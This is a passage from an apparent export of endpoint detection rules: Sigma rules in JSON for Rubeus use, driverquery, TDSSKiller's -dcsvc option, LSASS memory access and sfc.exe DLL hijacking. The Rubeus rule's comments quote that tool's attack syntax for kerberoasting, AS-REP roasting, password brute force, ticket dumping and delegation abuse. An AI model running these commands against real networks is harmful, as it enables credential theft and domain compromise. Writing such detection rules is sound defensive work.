users keystore (Smartcard) specifying certificate thumbprint or subject, start a /netonly process, and to apply the ticket to the new process/logon session:\n # Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\\Windows\\System32\\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap]\n selection_asktgt_1:\n CommandLine|contains: ' asktgt '\n selection_asktgt_2:\n CommandLine|contains:\n - ' /user:'\n - ' /password:'\n - ' /enctype:'\n - ' /des:'\n - ' /rc4:'\n - ' /aes128:'\n - ' /aes256:'\n - ' /domain:'\n - ' /dc:'\n\n # Retrieve a service ticket for one or more SPNs, optionally saving or applying the ticket:\n # Rubeus.exe asktgs [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec]\n selection_asktgs_1:\n CommandLine|contains: ' asktgs '\n selection_asktgs_2:\n CommandLine|contains:\n - ' /ticket:'\n - ' /service:'\n\n # Renew a TGT, optionally applying the ticket, saving it, or auto-renewing the ticket up to its renew-till limit:\n # Rubeus.exe renew [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/autorenew] [/nowrap]\n selection_renew:\n CommandLine|contains|all:\n - ' renew '\n - ' /ticket:'\n\n # Perform a Kerberos-based password bruteforcing attack:\n # Rubeus.exe brute [/user:USER | /users:USERS_FILE] [/domain:DOMAIN] [/creduser:DOMAIN\\\\USER & /credpassword:PASSWORD] [/ou:ORGANIZATION_UNIT] [/dc:DOMAIN_CONTROLLER] [/outfile:RESULT_PASSWORD_FILE] [/noticket] [/verbose] [/nowrap]\n selection_brute_1:\n CommandLine|contains: ' brute '\n selection_brute_2:\n CommandLine|contains:\n - ' /password:'\n - ' /passwords:'\n - ' /user:'\n - ' /users:'\n - ' /domain:'\n - ' /creduser:'\n - ' /credpassword:'\n\n # Perform Kerberoasting:\n # Rubeus.exe kerberoast [[/spn:\"blah/blah\"] | [/spns:C:\\temp\\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"] [/nowrap]\n # Perform Kerberoasting, outputting hashes to a file:\n # Rubeus.exe kerberoast /outfile:hashes.txt [[/spn:\"blah/blah\"] | [/spns:C:\\temp\\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"]\n # Perform Kerberoasting, outputting hashes in the file output format, but to the console:\n # Rubeus.exe kerberoast /simple [[/spn:\"blah/blah\"] | [/spns:C:\\temp\\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"] [/nowrap]\n # Perform Kerberoasting with alternate credentials:\n # Rubeus.exe kerberoast /creduser:DOMAIN.FQDN\\USER /credpassword:PASSWORD [/spn:\"blah/blah\"] [/spns:C:\\temp\\spns.txt] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"] [/nowrap]\n # Perform Kerberoasting with an existing TGT:\n # Rubeus.exe kerberoast [/nowrap]\n # Perform Kerberoasting with an existing TGT using an enterprise principal:\n # Rubeus.exe kerberoast /enterprise [/nowrap]\n # Perform Kerberoasting using the tgtdeleg ticket to request service tickets - requests RC4 for AES accounts:\n # Rubeus.exe kerberoast /usetgtdeleg [/nowrap]\n # Perform \"opsec\" Kerberoasting, using tgtdeleg, and filtering out AES-enabled accounts:\n # Rubeus.exe kerberoast /rc4opsec [/nowrap]\n # List statistics about found Kerberoastable accounts without actually sending ticket requests:\n # Rubeus.exe kerberoast /stats [/nowrap]\n # Perform Kerberoasting, requesting tickets only for accounts with an admin count of 1 (custom LDAP filter):\n # Rubeus.exe kerberoast /ldapfilter:'admincount=1' [/nowrap]\n # Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 5 service tickets:\n # Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5 [/nowrap]\n # Perform AES Kerberoasting:\n # Rubeus.exe kerberoast /aes [/nowrap]\n selection_kerberoast_1:\n CommandLine|contains: ' kerberoast '\n selection_kerberoast_2:\n CommandLine|contains:\n - ' /spn:'\n - ' /spns:'\n - ' /user:'\n - ' /domain:'\n - ' /credpassword:'\n - ' /creduser:'\n - ' /ticket:'\n - ' /usetgtdeleg'\n - ' /rc4opsec'\n - ' /stats'\n - ' /ldapfilter:'\n - ' /pwdsetafter:'\n - ' /aes'\n\n # Perform AS-REP \"roasting\" for any users without preauth:\n # Rubeus.exe asreproast [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"] [/nowrap]\n # Perform AS-REP \"roasting\" for any users without preauth, outputting Hashcat format to a file:\n # Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"]\n # Perform AS-REP \"roasting\" for any users without preauth using alternate credentials:\n # Rubeus.exe asreproast /creduser:DOMAIN.FQDN\\USER /credpassword:PASSWORD [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU,...\"] [/nowrap]\n selection_asreproast_1:\n CommandLine|contains: ' asreproast '\n selection_asreproast_2:\n CommandLine|contains:\n - ' /spn:'\n - ' /spns:'\n - ' /user:'\n - ' /domain'\n - ' /format:'\n - ' /creduser:'\n - ' /credpassword:'\n\n selection_ptt:\n CommandLine|contains|all:\n - ' ptt '\n - ' /ticket:'\n\n # Triage all current tickets (if elevated, list for all users), optionally targeting a specific LUID, username, or service:\n # Rubeus.exe triage [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]\n # List all current tickets in detail (if elevated, list for all users), optionally targeting a specific LUID:\n # Rubeus.exe klist [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]\n # Dump all current ticket data (if elevated, dump for all users), optionally targeting a specific service/LUID:\n # Rubeus.exe dump [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] [/nowrap]\n selection_extract_harvest_1:\n CommandLine|contains:\n - ' triage '\n - ' klist '\n - ' dump '\n selection_extract_harvest_2:\n CommandLine|contains:\n - ' /luid:'\n - ' /service:krbtgt'\n - ' /user:'\n\n # Create a hidden program (unless /show is passed) with random /netonly credentials, displaying the PID and LUID:\n # Rubeus.exe createnetonly /program:\"C:\\Windows\\System32\\cmd.exe\" [/show]\n selection_createnetonly:\n CommandLine|contains|all:\n - ' createnetonly '\n - ' /program:'\n\n # Perform S4U constrained delegation abuse:\n # Rubeus.exe s4u /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self]\n # Rubeus.exe s4u /user:USER [/domain:DOMAIN] /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self]\n # Perform S4U constrained delegation abuse across domains:\n # Rubeus.exe s4u /user:USER [/domain:DOMAIN] /msdsspn:SERVICE/SERVER /targetdomain:DOMAIN.LOCAL /targetdc:DC.DOMAIN.LOCAL [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/self]\n selection_s4u_1:\n CommandLine|contains: ' s4u '\n selection_s4u_2:\n CommandLine|contains:\n - ' /ticket:'\n - ' /impersonateuser:'\n - ' /tgs:'\n - ' /user:'\n\n # Some parameters (klist, ..) don't require other parameters. We want to be able to detect rubeus anyway, so match on internal data about it\n selection_internal_name:\n Description: 'Rubeus'\n OriginalFileName: 'Rubeus.exe'\n InternalName: 'Rubeus.exe'\n\n exclusion_solidworks:\n ProcessImage: '?:\\Program Files\\SOLIDWORKS Corp\\SOLIDWORKS Flow Simulation\\binCFW\\efdsolver.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mentor Graphics Corporation'\n\n condition: (selection_tgtdeleg or (all of selection_asktgt_*) or (all of selection_asktgs_*) or selection_renew or (all of selection_brute_*) or (all of selection_kerberoast_*) or (all of selection_asreproast_*) or selection_ptt or (all of selection_extract_harvest_*) or selection_createnetonly or (all of selection_s4u_*) or selection_internal_name) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4bda5ac1-8161-4338-88d4-bdb0ab0899ac",
"rule_name": "Rubeus HackTool Executed",
"rule_description": "Detects the usage of Rubeus from command-line arguments.\nRubeus is a C# command-line tool developed to misuse and manipulate Kerberos authentication in Windows Active Directory environments.\nThis tool has been used by attackers in ransomware operations.\nIt is recommended to verify if the usage of this tool is legitimate using the process tree to gather more information about the execution context, as well as to look for any other malicious behavior on the host.\n",
"rule_creation_date": "2020-11-16",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078",
"attack.t1550.002",
"attack.t1550.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4c017732-d9c4-4ebf-ac10-8714261e6380",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296733Z",
"creation_date": "2026-03-23T11:45:35.296735Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296740Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/driverquery",
"https://attack.mitre.org/techniques/T1082/"
],
"name": "t1082_driverquery.yml",
"content": "title: DriverQuery Execution\nid: 4c017732-d9c4-4ebf-ac10-8714261e6380\ndescription: |\n Detects the execution of 'driverquery.exe'.\n Driverquery is often used by attackers to gather detailed information about the different drivers on a running on a system.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/driverquery\n - https://attack.mitre.org/techniques/T1082/\ndate: 2021/05/06\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\driverquery.exe'\n # Renamed binaries\n - OriginalFileName: 'drvqry.exe'\n\n selection_context:\n ParentImage|contains: '?'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_program_files:\n ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_sophos:\n ParentImage: '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\su-repair.exe'\n\n exclusion_lenovo:\n ParentCommandLine|endswith: ' /C driverquery /fo list | findstr MEIx64'\n GrandparentImage|endswith:\n - '\\fwdetect.exe'\n - '\\fwdetect_v??.exe'\n\n exclusion_fujitsu:\n ParentCommandLine|contains: ' /c Driverquery | findstr '\n GrandparentImage|endswith: '\\CheckBatteryFW.exe'\n\n exclusion_nordvpn:\n ParentImage: '*\\AppData\\Local\\Temp\\\\*\\nordvpn-*.tmp'\n GrandparentImage: '*\\nordvpn-*.exe'\n\n exclusion_hp:\n - ParentImage:\n - '?:\\WINDOWS\\System32\\DriverStore\\FileRepository\\hpanalyticscomp.inf_*\\x64\\TouchpointAnalyticsClient.exe'\n - '?:\\WINDOWS\\System32\\DriverStore\\FileRepository\\hpanalyticscomp.inf_*\\x64\\TouchpointAnalyticsClientService.exe'\n - GrandparentImage: '?:\\Program Files\\Hewlett-Packard\\AMS\\service\\hpqams.exe'\n\n exclusion_docker:\n # powershell -NoProfile -Command &{ driverquery /FO CSV }\n ParentCommandLine|contains|all:\n - 'powershell -NoProfile -Command'\n - 'driverquery /FO CSV'\n GrandparentImage: '?:\\Program Files\\Docker\\Docker\\resources\\com.docker.diagnose.exe'\n\n # ElsterAuthenticator\n exclusion_elester:\n GrandparentImage:\n - '?:\\Program Files\\ElsterAuthenticator\\ElsterAuthenticator.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\ElsterAuthenticator\\ElsterAuthenticator.exe'\n\n exclusion_messenger2go:\n ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /s /c driverquery /FO list /v'\n GrandparentImage: '?:\\Users\\\\*\\AppData\\Roaming\\Messenger2go\\Messenger2go.exe'\n\n exclusion_defender:\n - ParentImage: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\SenseIR.exe'\n - GrandparentImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n\n exclusion_suuntolink:\n CommandLine: '?:\\WINDOWS\\sysnative\\driverquery.exe /v /fo csv /nh'\n ParentCommandLine|startswith:\n - '?:\\Users\\\\*\\AppData\\Local\\Suuntolink\\app-*\\Suuntolink.exe'\n - '?:\\ProgramData\\\\*\\Suuntolink\\app-*\\Suuntolink.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumClient.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcagentservice.exe'\n - '?:\\Program Files\\Mesh Agent\\MeshAgent.exe'\n - '?:\\ProgramData\\JWrapper-Remote Access\\JWrapper-Windows*\\bin\\Remote Access.exe'\n - '?:\\Program Files (x86)\\MSI\\MSI_Driver_Utility_Installer\\MSI_Driver_Utility_Installer.exe'\n - '?:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4c017732-d9c4-4ebf-ac10-8714261e6380",
"rule_name": "DriverQuery Execution",
"rule_description": "Detects the execution of 'driverquery.exe'.\nDriverquery is often used by attackers to gather detailed information about the different drivers on a running on a system.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2021-05-06",
"rule_modified_date": "2026-02-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1082"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4c0aa693-e40f-4aad-8bb5-79144acd7b68",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080377Z",
"creation_date": "2026-03-23T11:45:34.080379Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080384Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/lockbit-ransomware-silently-disables-edr-using-tdsskiller",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_tdsskiller_dcsvc.yml",
"content": "title: Malicious Execution of TDSSKiller\nid: 4c0aa693-e40f-4aad-8bb5-79144acd7b68\ndescription: |\n Detects execution of TDSSKiller which is a free tool developed by Kaspersky for detecting and removing rootkits.\n This tool is also capable of disabling stubborn malicious processes via command prompt execution.\n It can be abused to terminate antivirus and EDR softwares with the \"-dcsvc\" option.\n This option deletes the specified service, removing the registry keys and executables associated with the service and software.\n LockBit 3.0 Ransomware group is already known to abuse this tool.\n It is recommended to determine if this tool was used for nefarious purposes by looking at the service specified in the \"-dcsvc\" option. If this tool was used to disable a security product, it is recommended to isolate affected machines and start an investigation.\nreferences:\n - https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/lockbit-ransomware-silently-disables-edr-using-tdsskiller\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/07/27\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.TDSSKiller\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Product: 'TDSSKiller'\n - OriginalFileName: 'TDSSKiller.exe'\n - InternalName: 'TDSSKiller'\n\n selection_option:\n CommandLine|contains: '-dcsvc'\n\n condition: all of selection_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4c0aa693-e40f-4aad-8bb5-79144acd7b68",
"rule_name": "Malicious Execution of TDSSKiller",
"rule_description": "Detects execution of TDSSKiller which is a free tool developed by Kaspersky for detecting and removing rootkits.\nThis tool is also capable of disabling stubborn malicious processes via command prompt execution.\nIt can be abused to terminate antivirus and EDR softwares with the \"-dcsvc\" option.\nThis option deletes the specified service, removing the registry keys and executables associated with the service and software.\nLockBit 3.0 Ransomware group is already known to abuse this tool.\nIt is recommended to determine if this tool was used for nefarious purposes by looking at the service specified in the \"-dcsvc\" option. If this tool was used to disable a security product, it is recommended to isolate affected machines and start an investigation.\n",
"rule_creation_date": "2023-07-27",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4c2e7819-9e13-4d0f-8926-6bab029881d7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627583Z",
"creation_date": "2026-03-23T11:45:34.627585Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627589Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/codewhitesec/HandleKatz",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_pic_lsass_dumper.yml",
"content": "title: LSASS Process Memory Accessed from a PIC\nid: 4c2e7819-9e13-4d0f-8926-6bab029881d7\ndescription: |\n Detects an attempt to dump the LSASS.exe process from an unknown module (either via dumping handles or accessing process memory directly).\n This is likely done when LSASS is accessed from Position Independent Code (shellcode).\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to look for other suspicious processes and alerts on the affected endpoint.\nreferences:\n - https://github.com/codewhitesec/HandleKatz\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/11/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains:\n - 'PROCESS_DUP_HANDLE'\n - 'PROCESS_VM_READ'\n CallTrace:\n - 'UNKNOWN(????????????????)'\n - 'UNKNOWN(????????????????)?UNKNOWN(????????????????)'\n - 'UNKNOWN(????????????????)?UNKNOWN(????????????????)?UNKNOWN(????????????????)'\n\n exclusion_kaspersky:\n ProcessImage: '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security for Windows\\avp.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Kaspersky Lab JSC'\n\n exclusion_sophos:\n ProcessImage: '?:\\Program Files (x86)\\Sophos\\Sophos Anti-Virus\\SavService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Sophos Ltd'\n\n exclusion_afkjourney:\n ProcessImage|endswith: '\\AFKJourney Game\\game\\AFK Journey.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Shanghai Lilith Network Technology Co., Ltd.'\n\n exclusion_eset:\n # C:\\Program Files\\ESET\\ESET Security\\ekrn.exe\n ProcessOriginalFileName: 'ekrn.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ESET, spol. s r.o.'\n\n exclusion_defender:\n ProcessImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n\n\n exclusion_synology:\n ProcessImage: '?:\\program files (x86)\\synology\\assistant\\usbclientservice.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Synology Inc.'\n\n exclusion_vanguard:\n ProcessImage: '?:\\program files\\riot vanguard\\vgm.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Riot Games, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4c2e7819-9e13-4d0f-8926-6bab029881d7",
"rule_name": "LSASS Process Memory Accessed from a PIC",
"rule_description": "Detects an attempt to dump the LSASS.exe process from an unknown module (either via dumping handles or accessing process memory directly).\nThis is likely done when LSASS is accessed from Position Independent Code (shellcode).\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to look for other suspicious processes and alerts on the affected endpoint.\n",
"rule_creation_date": "2021-11-19",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4c4121af-1fcf-4b14-b225-083b79f93554",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081481Z",
"creation_date": "2026-03-23T11:45:34.081483Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081488Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0gtweet/status/1363107343018385410",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sfc.yml",
"content": "title: DLL Hijacking via sfc.exe\nid: 4c4121af-1fcf-4b14-b225-083b79f93554\ndescription: |\n Detects potential Windows DLL Hijacking via sfc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/0gtweet/status/1363107343018385410\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sfc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\powrprof.dll'\n - '\\ssshim.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4c4121af-1fcf-4b14-b225-083b79f93554",
"rule_name": "DLL Hijacking via sfc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sfc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4cc44598-022c-4ded-bcf1-b3c0b87f5f6d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606677Z",
"creation_date": "2026-03-23T11:45:34.606680Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606688Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md",
"https://www.mandiant.com/resources/live-off-the-land-an-overview-of-unc1945",
"https://attack.mitre.org/techniques/T1070/006/"
],
"name": "t1070_006_touch_timestomp_linux.yml",
